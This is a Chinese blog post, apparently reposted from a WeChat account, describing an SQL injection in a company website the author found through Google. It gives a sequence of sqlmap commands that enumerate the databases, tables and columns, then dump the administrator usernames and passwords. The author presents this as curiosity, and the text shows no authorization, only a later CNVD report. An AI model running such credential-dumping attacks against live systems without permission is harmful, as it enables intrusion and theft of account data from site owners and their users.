记某公司前台SQL注入漏洞

admin 2023年8月5日12:35:49评论17 views字数 694阅读2分18秒阅读模式

前言

本次实战来源于谷歌搜索引擎。漏洞已经上报CNVD,全程会打码。


实战过程

1.打开网站的前台,此时页面是正常显示,在URL头中发现id值。

记某公司前台SQL注入漏洞


2.尝试加入单引号验证是否存在SQL注入漏洞。发现加入单引号后,页面发生了一些变化。

记某公司前台SQL注入漏洞


3.直接使用我们的SQL注入神器-SqlMap扫描一波数据库。成功扫描出来数据库。

SqlMap:

python sqlmap.py -u "http://XXXX.com/about.php?id=1"--delay 2 --batch –dbs

记某公司前台SQL注入漏洞


4.继续查看数据库XXX里面的所有表。

SqlMap:

python sqlmap.py -u "http://XXXX.com/about.php?id=1"--delay 2 --batch -D XXXX --tables

记某公司前台SQL注入漏洞


5.查看到了所有的表名,好奇心唆使我查看XXX表里的内容😜

SqlMap:

python sqlmap.py -u "http://XXXX.com/about.php?id=1"--delay 2 --batch -D XXXX -T XXXX –colum

记某公司前台SQL注入漏洞


6.都到这里了,必须查看里面到底有些啥。这里得到了网站管理员的账号密码😁

SqlMap:

python sqlmap.py -u "http://XXXX.com/about.php?id=1"--delay 2 --batch -D XXXX -T XXXX -C admin_name,admin_pass --dump

记某公司前台SQL注入漏洞


上报CNVD漏洞平台,溜了溜了。


更多文章请关注公众号:星河疯客admin

记某公司前台SQL注入漏洞

万水千山总是情,点赞再走行不行是o(* ̄▽ ̄*)o

原文始发于微信公众号(星河疯客admin):记某公司前台SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月5日12:35:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记某公司前台SQL注入漏洞https://cn-sec.com/archives/881069.html

发表评论

匿名网友 填写信息